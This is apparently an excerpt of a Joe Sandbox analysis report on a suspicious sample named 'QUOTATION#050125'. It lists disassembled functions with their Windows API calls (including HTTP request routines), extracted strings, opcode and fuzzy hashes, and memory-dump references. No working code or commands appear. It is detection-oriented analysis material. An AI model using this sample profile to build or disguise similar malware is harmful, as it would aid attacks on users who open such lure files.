                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                      • String ID:
                                                                                      • API String ID: 3869813825-0
                                                                                      • Opcode ID: 4dc8b35a2e6ac1b94ede25e18b5fe45451c9df37b958aa25a92dd932edd23ae1
                                                                                      • Instruction ID: 01ead19fd84c7799bd9ebce1306edf65559687e8f77d4d2c062cf4c5e9ef6f6e
                                                                                      • Opcode Fuzzy Hash: 4dc8b35a2e6ac1b94ede25e18b5fe45451c9df37b958aa25a92dd932edd23ae1
                                                                                      • Instruction Fuzzy Hash: 9771AD31900B19EFDB20DFA8DE85AAEBBF6FF48705F104518E182A76A0D770E950CB50
                                                                                      Function 000E00ED Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 87libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0019070C,00000FA0,FC2683AB,?,?,?,?,001023B3,000000FF), ref: 000E011C
                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001023B3,000000FF), ref: 000E0127
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001023B3,000000FF), ref: 000E0138
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000E014E
                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000E015C
                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000E016A
                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,001023B3,000000FF), ref: 000E01B5
                                                                                      • DeleteCriticalSection.KERNEL32(0019070C,00000007,?,?,?,?,001023B3,000000FF), ref: 000E01E1
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001023B3,000000FF), ref: 000E01F1
                                                                                      Strings
                                                                                      • InitializeConditionVariable, xrefs: 000E0148
                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000E0122
                                                                                      • SleepConditionVariableCS, xrefs: 000E0154
                                                                                      • WakeAllConditionVariable, xrefs: 000E0162
                                                                                      • kernel32.dll, xrefs: 000E0133
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleProc$CriticalModuleSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                      • API String ID: 3758863719-1714406822
                                                                                      • Opcode ID: f75c6747a1d5477d959fbbc5b9e454169709e04513f61f6b7b9500ab30da4114
                                                                                      • Instruction ID: ae98bc068795bdd99604f93bc2228aa0ed782a001039197caf8178309d094ad6
                                                                                      • Opcode Fuzzy Hash: f75c6747a1d5477d959fbbc5b9e454169709e04513f61f6b7b9500ab30da4114
                                                                                      • Instruction Fuzzy Hash: 1C21DE31645741EFEB515FF5AC49B6A37F8EB08B62F000129FC41EA691DBB49C80CAD0
                                                                                      Function 00143FE9 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0015CC08), ref: 001440BB
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001440CD
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0015CC08), ref: 001440F2
                                                                                      • FreeLibrary.KERNEL32(00000000,?,0015CC08), ref: 0014413E
                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,0015CC08), ref: 001441A8
                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 00144262
                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001442C8
                                                                                      • SysFreeString.OLEAUT32(?), ref: 001442F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                      • API String ID: 354098117-199464113
                                                                                      • Opcode ID: a7ce5a45a06a3a801a3a4a005256586d1d59e5b252913a52ce681c337ac7ca90
                                                                                      • Instruction ID: 3c3b514c0ff2d360c41ce67fa40362df074de20b6a22c852abe0133463f44bc5
                                                                                      • Opcode Fuzzy Hash: a7ce5a45a06a3a801a3a4a005256586d1d59e5b252913a52ce681c337ac7ca90
                                                                                      • Instruction Fuzzy Hash: 97122775A00219EFDB14CF94C884EAEBBB5BF45314F258098F905AB261D731ED86CBA0
                                                                                      Function 0015091E Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 372windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 001509C6
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00150A54
                                                                                        • Part of subcall function 00122BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00122BFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpper
                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                      • API String ID: 3391685005-4258414348
                                                                                      • Opcode ID: 5e236de13a9fbe29b267ef29b4924a6c1be32c606facdddcd387c580c903e7bf
                                                                                      • Instruction ID: 2408238242c4c18d087d56b1da5a220560f726e0fbc177d3ac40108de0f904c8
                                                                                      • Opcode Fuzzy Hash: 5e236de13a9fbe29b267ef29b4924a6c1be32c606facdddcd387c580c903e7bf
                                                                                      • Instruction Fuzzy Hash: F7E1DF35208301CFC715DFA4C49096EB7E1BF98314B15895CF8AAAB3A2D730EE49CB81
                                                                                      Function 000C326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(00191990), ref: 00102F8D
                                                                                      • GetMenuItemCount.USER32(00191990), ref: 0010303D
                                                                                      • GetCursorPos.USER32(?), ref: 00103081
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0010308A
                                                                                      • TrackPopupMenuEx.USER32(00191990,00000000,?,00000000,00000000,00000000), ref: 0010309D
                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001030A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 36266755-4108050209
                                                                                      • Opcode ID: 9889443a608f560bdcc809eb3ef91425c2a7764c931ca62b85d1fdd47d21ce77
                                                                                      • Instruction ID: 3a08711eb1169e27aa523df3b0738d10d8216f2ce975fdcf56c8612a88a28428
                                                                                      • Opcode Fuzzy Hash: 9889443a608f560bdcc809eb3ef91425c2a7764c931ca62b85d1fdd47d21ce77
                                                                                      • Instruction Fuzzy Hash: 2371F370644216BFEB259F64DC89FAEBF68FF05364F208216F5256A1E0C7B1A950CB90
                                                                                      Function 00133E79 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00133EF8
                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00133FD6
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0013401E
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00134059
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00134087
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString$BuffCharDriveLowerType
                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                      • API String ID: 1600147383-4113822522
                                                                                      • Opcode ID: ff6911b40bccd8b3dd6c418c5c9c3886f9e561b14d01b485bba53bdbeaa4cccd
                                                                                      • Instruction ID: e1324fc5dd033e8f354b299519768571aed88a4d96f33b628c37b87ee71531f3
                                                                                      • Opcode Fuzzy Hash: ff6911b40bccd8b3dd6c418c5c9c3886f9e561b14d01b485bba53bdbeaa4cccd
                                                                                      • Instruction Fuzzy Hash: 6871E4326043019FC714EF24C8819AEB7F4EF94758F50492DF8A697252EB31EE45CB92
                                                                                      Function 0015833C Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001583F2
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00155BF2), ref: 0015844E
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00158487
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001584CA
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00158501
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0015850D
                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0015851D
                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00155BF2), ref: 0015852C
                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00158549
                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00158555
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                                                      • String ID: .dll$.exe$.icl
                                                                                      • API String ID: 1446636887-1154884017
                                                                                      • Opcode ID: 5ea143b0b7b2a1a90818490b03d3079eacb38f8f2ef5ac0ac1d9ae790ed22348
                                                                                      • Instruction ID: 7df2516ab6c7da0ac2d8d2d898f3f6545676ad3b5ec096f8992cb94430fc5223
                                                                                      • Opcode Fuzzy Hash: 5ea143b0b7b2a1a90818490b03d3079eacb38f8f2ef5ac0ac1d9ae790ed22348
                                                                                      • Instruction Fuzzy Hash: A2619E71510715FEEB149F64CC85BFE77A8BB08722F104509FD25EA1D1EBB4AA84CBA0
                                                                                      Function 00156CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00156DEB
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00156E5F
                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00156E81
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00156E94
                                                                                      • DestroyWindow.USER32(?), ref: 00156EB5
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000C0000,00000000), ref: 00156EE4
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00156EFD
                                                                                      • GetDesktopWindow.USER32 ref: 00156F16
                                                                                      • GetWindowRect.USER32(00000000), ref: 00156F1D
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00156F35
                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00156F4D
                                                                                        • Part of subcall function 000D9944: GetWindowLongW.USER32(?,000000EB), ref: 000D9952
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                                                      • String ID: 0$tooltips_class32
                                                                                      • API String ID: 1652260434-3619404913
                                                                                      • Opcode ID: 7eaa074694f524a8d4f232a1e85890d5640e446b0e7a9fb2d493316559fde984
                                                                                      • Instruction ID: d2980b75ff6e75737208885cc1f0d7b50dc683c001117cde9582acf292676948
                                                                                      • Opcode Fuzzy Hash: 7eaa074694f524a8d4f232a1e85890d5640e446b0e7a9fb2d493316559fde984
                                                                                      • Instruction Fuzzy Hash: 34717970504341EFDB21CF18DC54FAABBE9FB99305F44051EF9998B261C770A98ACB91
                                                                                      Function 0015911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00159147
                                                                                        • Part of subcall function 00157674: ClientToScreen.USER32(?,?), ref: 0015769A
                                                                                        • Part of subcall function 00157674: GetWindowRect.USER32(?,?), ref: 00157710
                                                                                        • Part of subcall function 00157674: PtInRect.USER32(?,?,00158B89), ref: 00157720
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 001591B0
                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001591BB
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001591DE
                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00159225
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0015923E
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00159255
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00159277
                                                                                      • DragFinish.SHELL32(?), ref: 0015927E
                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00159371
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                      • API String ID: 221274066-3440237614
                                                                                      • Opcode ID: b8959c2d926252fc0efe45f2c3facacfe9743d327c6a795543d0d92941d11c24
                                                                                      • Instruction ID: 8f56bcae9c06a40d9ba44279aef907fe2b3af17fbbcf772b7234567bf0220311
                                                                                      • Opcode Fuzzy Hash: b8959c2d926252fc0efe45f2c3facacfe9743d327c6a795543d0d92941d11c24
                                                                                      • Instruction Fuzzy Hash: 7D616B71108301EFD701EF64DC85EAFBBE8EF89750F00092EF5A5961A1DB709A49CB92
                                                                                      Function 0013C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0013C4B0
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0013C4C3
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0013C4D7
                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0013C4F0
                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0013C533
                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0013C549
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0013C554
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0013C584
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0013C5DC
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0013C5F0
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0013C5FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                      • String ID:
                                                                                      • API String ID: 3800310941-3916222277
                                                                                      • Opcode ID: d19888c2a921183d54c650650c8e2e847c450c8aa866fa2d91dd59d42f53eed4
                                                                                      • Instruction ID: 5f23fd5e2e8e4be735ef458e4e079bc816384679c890b866a131984e1052eb96
                                                                                      • Opcode Fuzzy Hash: d19888c2a921183d54c650650c8e2e847c450c8aa866fa2d91dd59d42f53eed4
                                                                                      • Instruction Fuzzy Hash: BC514AB1600709FFDB219FA4CD88AAB7BBCFF08755F004419F945AA610DB35E944DBA0
                                                                                      Function 0015856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00158592
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585A2
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585AD
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585BA
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 001585C8
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585D7
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001585E0
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585E7
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585F8
                                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0015FC38,?), ref: 00158611
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00158621
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00158641
                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00158671
                                                                                      • DeleteObject.GDI32(?), ref: 00158699
                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001586AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3840717409-0
                                                                                      • Opcode ID: 0c8fa17a97642f755febb525b334915dbabbf168e3137a1df8689729a8cbff3e
                                                                                      • Instruction ID: b0f1f65f32c0a6856486671a90a9eadb47acc76410925d20c70a015f5acbdc6c
                                                                                      • Opcode Fuzzy Hash: 0c8fa17a97642f755febb525b334915dbabbf168e3137a1df8689729a8cbff3e
                                                                                      • Instruction Fuzzy Hash: 4D411975600308EFDB119FA5CC88EAA7BB8FF89716F104158F916EB260DB309945CF60
                                                                                      Function 001314BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00131502
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0013150B
                                                                                      • VariantClear.OLEAUT32(?), ref: 00131517
                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001315FB
                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00131657
                                                                                      • VariantInit.OLEAUT32(?), ref: 00131708
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0013178C
                                                                                      • VariantClear.OLEAUT32(?), ref: 001317D8
                                                                                      • VariantClear.OLEAUT32(?), ref: 001317E7
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00131823
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                      • API String ID: 1234038744-3931177956
                                                                                      • Opcode ID: 3aae492a8d96ed1338959e3a1ee8f0f025a322108aa2bf382199b020d596e83a
